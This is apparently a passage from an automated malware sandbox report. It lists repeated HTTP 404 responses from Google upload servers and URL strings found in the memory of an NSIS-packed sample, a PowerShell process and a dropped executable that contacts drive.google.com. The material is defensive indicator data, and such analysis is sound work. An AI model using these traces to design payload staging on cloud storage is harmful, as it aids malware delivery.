ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC465sMTDEp3ooA4mTwWWXoSiJ0rumossrJ9iSeAZ1RTFaEuZex8ub0vpAGfwamMrrebContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:24 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-p5EoMlXxSrcDjMDtk6uGgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSY6dbrpVgWGHMfOY8F0UFdJ9Z0KveMhvzTpappJTYwx_Ps17BWNKVzmv1he_wyCsNJqel7NRQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-n8-_fx-xPXjID3G9y-_ePg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQX0vdYM1Iova-R5sUZlx9ZdzEhl8_W2UiYIcbt25FN7r-laO14idiGfsa_rY_XGdTyZ7NfibcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:29 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7aa_Hja7sXYGL4bArwtT4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6wYjaMnsKYP8Z_EKDepRHGTqY6CS_aMdTIqeXFZ7lvSxbrfMy-RHs7plxlN8ho-J4bkA7ca74Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:31 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-gxAafJmN17SefH3yfGHOMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTLIssDCzWFbOUwNqpzT03KRKDhfGwvgQcFexUw5z4Xoqqwiw90Ov1sunmqxyUMO031Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:34 GMTContent-Security-Policy: script-src 'nonce-onz_QF8a5M-uPghnW9aw_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6yiVOmoJPcHaZ3zEhfW3E158_wGyfnx1NQ7tTaB25aPU9RXDYDTVjqbpayddFokWoB3pYcd6gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-mhTIyIf-D2EniRLn6cC_lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgStGGVEuaZxYHgxMkQVeshSF5YeyuWhLvxPkUtEz0hjSPV9rc-1n3NFYHYdbRb6APUyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7LxbZh3Vx_-zy7Qxp_Jieg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSE9w5OM9PRnkq2jF5FD20hLA9itqGpKhJCWFTgqREGHA-HMwkUyk8VYro5205aHhX-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:40 GMTContent-Security-Policy: script-src 'nonce-Ug9YJVTGSzHQ48pgvEAAlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTTRccEoQgGE4T4VtmxnaoUMcwoxRSyaoeR8C8CVXvqUOB0tFIG7Zsbbys0EH10SY_GzvF0Yi8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:43 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-2pegk7PAPh3czbgBH2PyyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSErVEqcdiIYo9SO5Exgcey7DWQfl4gze3x4aZqtQai4FmKic0c3tbf28TPNAM99Vs8W-uvtAkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_bQNRZwhqnKEr4bNaHblDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQpoSdLOOwFCF8-xB6eH5QrKi_F3X152yJCbzpw_xyeDzwmpIoxkbbib5K8mrwvJ6RGSPW81fUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:47 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-UssDjWYbp9ezv6iBZMfWuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: Cpfkf79Rzk.exe, 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Cpfkf79Rzk.exe, 00000000.00000000.1394783976.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Kvababbelser58.exe, 00000007.00000000.2058334532.000000000040A000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2069318942.00000000081EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
      Source: powershell.exe, 00000002.00000002.2069318942.0000000008212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: Kvababbelser58.exe, 00000007.00000003.2573107451.0000000005507000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2629989123.0000000005508000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595812052.0000000005507000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607422737.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584865349.0000000005507000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2561976244.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550492159.0000000005506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
      Source: Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005448000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2629989123.0000000005508000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/1
      Source: Kvababbelser58.exe, 00000007.00000003.2629989123.0000000005508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/=
      Source: Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Local
